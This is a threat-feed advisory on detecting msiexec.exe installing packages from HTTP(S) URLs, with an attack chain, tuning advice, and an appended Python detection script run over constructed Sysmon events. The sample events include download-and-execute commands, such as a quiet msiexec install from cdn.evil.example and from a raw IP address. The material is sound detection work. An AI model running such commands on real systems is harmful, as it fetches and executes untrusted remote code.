{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/remote-download/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud","Network Visibility Module"],"_cs_severities":["high"],"_cs_tags":["endpoint","msiexec","remote-download","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Cisco","Splunk"],"content_html":"\u003cp\u003eThe detection identifies instances where \u003ccode\u003emsiexec.exe\u003c/code\u003e is executed with an HTTP or HTTPS URL in its command line. Because the Windows Installer will fetch and install a package directly from a URL passed as the package source, this behavior indicates an attempt to download and execute potentially malicious software from a remote server. The detection uses process execution logs from Endpoint Detection and Response (EDR) agents that include command-line details. If confirmed malicious, this could lead to unauthorized code execution, system compromise, or further malware deployment within the network. 
Because \u003ccode\u003emsiexec.exe\u003c/code\u003e is a Microsoft-signed, trusted-by-default Windows binary, the technique is often used to bypass application control and other traditional security controls.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access through various means, such as phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages \u003ccode\u003emsiexec.exe\u003c/code\u003e, a legitimate Windows utility, to download a malicious MSI package from a remote HTTP or HTTPS server.\u003c/li\u003e\n\u003cli\u003eThe command line includes a URL pointing to a malicious MSI file hosted on a compromised or attacker-controlled server.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003emsiexec.exe\u003c/code\u003e downloads the MSI package to the victim\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe MSI package is executed, potentially installing malware, creating new files, or modifying system settings.\u003c/li\u003e\n\u003cli\u003eThe installed malware establishes persistence through registry keys or scheduled tasks.\u003c/li\u003e\n\u003cli\u003eThe malware initiates command and control (C2) communication to receive further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker performs actions on the objective such as data exfiltration or lateral movement within the compromised network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized code execution, system compromise, or further malware deployment within the network. The use of \u003ccode\u003emsiexec.exe\u003c/code\u003e for remote downloads can bypass traditional security controls, allowing attackers to deliver and execute malicious payloads undetected. 
The dfirreport.com article referenced by this brief describes data exfiltration following compromise via MSIExec.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process-creation logging with command-line capture (Sysmon Event ID 1); the rules below depend on it.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune them for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections originating from \u003ccode\u003emsiexec.exe\u003c/code\u003e to external HTTP/HTTPS URLs (Network Visibility Module Flow Data).\u003c/li\u003e\n\u003cli\u003eInvestigate any instance of \u003ccode\u003emsiexec.exe\u003c/code\u003e executing with command-line arguments containing an HTTP or HTTPS URL, paying particular attention to quiet installs (\u003ccode\u003e/q\u003c/code\u003e, \u003ccode\u003e/qn\u003c/code\u003e) launched from scripting hosts such as PowerShell or cmd.exe.\u003c/li\u003e\n\u003cli\u003eFilter false positives by destination host or parent process as needed; legitimate software distribution from trusted internal hosts is the most common benign source of matches.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-03-msiexec-remote-download/","summary":"The analytic detects the execution of msiexec.exe with an HTTP or HTTPS URL, which indicates an attempt to download and execute potentially malicious software from a remote server, leading to potential unauthorized code execution, system compromise, or malware deployment.","title":"Suspicious MSIExec Remote Download","url":"https://feed.craftedsignal.io/briefs/2024-01-03-msiexec-remote-download/"}],"language":"en","title":"CraftedSignal Threat Feed — Remote-Download","version":"https://jsonfeed.org/version/1.1"}
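The brief above describes the analytic (msiexec.exe with an HTTP or HTTPS URL in its command line, sourced from EDR process-creation logs, with false positives filtered by destination or parent process) but does not include the rule logic. The following is an added example of that detection run over constructed Sysmon Event ID 1 records; it is not CraftedSignal's, Splunk's or Sigma's code. The record shape follows Sysmon's process-creation EventData field names (Image, CommandLine, ParentImage, User) plus Computer from the event header; the allow-listed host `pkg.corp.example`, the deployment agent path, and every host, user and package name in the samples are hypothetical.

```python
"""Detect msiexec.exe launched with an HTTP(S) URL in its command line.

Added example, not CraftedSignal's or Splunk's code. Input records mimic
Sysmon Event ID 1 (process creation) fields; all hosts, users and package
names below are constructed for illustration.
"""
import re
from typing import List, Optional
from urllib.parse import urlparse

# http:// or https:// anywhere in the command line, any letter case, captured
# up to the next whitespace or quote character.
URL_RE = re.compile(r'(?i)\bhttps?://[^\s"\']+')

# Windows Installer quiet/no-UI switches (/q, /qn, /qb, /quiet), any case.
QUIET_RE = re.compile(r'(?i)(?:^|\s)/(?:quiet|qn|qb|q)\b')

# Hypothetical allow-list of internal software-distribution hosts.
TRUSTED_HOSTS = {"pkg.corp.example"}

# Hypothetical parent images that legitimately drive msiexec from a URL.
TRUSTED_PARENTS = {r"c:\program files\deployagent\deployagent.exe"}


def is_msiexec(image: str) -> bool:
    """Compare only the file name of Image, case-insensitively (SysWOW64 too)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "msiexec.exe"


def extract_urls(command_line: str) -> List[str]:
    return URL_RE.findall(command_line)


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert for a matching event, or None."""
    if event.get("EventID") != 1 or not is_msiexec(event.get("Image", "")):
        return None
    cmd = event.get("CommandLine", "")
    urls = extract_urls(cmd)
    if not urls:
        return None  # local or UNC package source: out of scope for this rule
    hosts = {urlparse(u).hostname or "" for u in urls}
    parent = event.get("ParentImage", "").lower()
    # Tuning: suppress when every URL points at a trusted host, or the parent
    # is a known deployment agent. Prefer the host check; parents can be abused.
    if hosts <= TRUSTED_HOSTS or parent in TRUSTED_PARENTS:
        return None
    return {
        "computer": event.get("Computer"),
        "user": event.get("User"),
        "parent": parent,
        "urls": urls,
        "quiet": bool(QUIET_RE.search(cmd)),
        "command_line": cmd,
        "severity": "high",
    }


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {  # suspicious: quiet install straight from an external URL via cmd.exe
        "EventID": 1, "Computer": "WS01", "User": "CORP\\jdoe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i https://cdn.evil.example/update.msi /qn",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {  # benign: local package, no URL in the command line
        "EventID": 1, "Computer": "WS01", "User": "CORP\\jdoe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec.exe /i "C:\Users\jdoe\Downloads\7z.msi"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {  # tuned out: internal distribution host on the allow-list
        "EventID": 1, "Computer": "WS02", "User": "NT AUTHORITY\\SYSTEM",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /package http://pkg.corp.example/agent.msi /quiet",
        "ParentImage": r"C:\Program Files\DeployAgent\deployagent.exe",
    },
    {  # not msiexec at all, even though a URL is present
        "EventID": 1, "Computer": "WS02", "User": "CORP\\asmith",
        "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
        "CommandLine": r'"firefox.exe" https://example.org/',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {  # suspicious: upper-case scheme and binary, launched from PowerShell
        "EventID": 1, "Computer": "WS03", "User": "CORP\\bwayne",
        "Image": r"C:\Windows\SysWOW64\MSIEXEC.EXE",
        "CommandLine": r"MSIEXEC /Q /I HTTP://203.0.113.7:8080/a.msi",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
]


def run(events: List[dict] = SAMPLE_EVENTS) -> List[dict]:
    """Evaluate every event and return the alerts in input order."""
    return [a for a in (evaluate(e) for e in events) if a]


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Run over the constructed samples this produces two alerts (the cmd.exe- and PowerShell-launched installs) and suppresses the local package, the allow-listed internal host and the non-msiexec event. The same predicate expressed for a SIEM is the familiar Sigma selection of Image ending in `msiexec.exe` together with CommandLine containing `http://` or `https://`; the host and parent allow-lists are where environment-specific tuning belongs, and the host check is the safer of the two because an attacker who has already compromised the deployment agent inherits its trusted parent image.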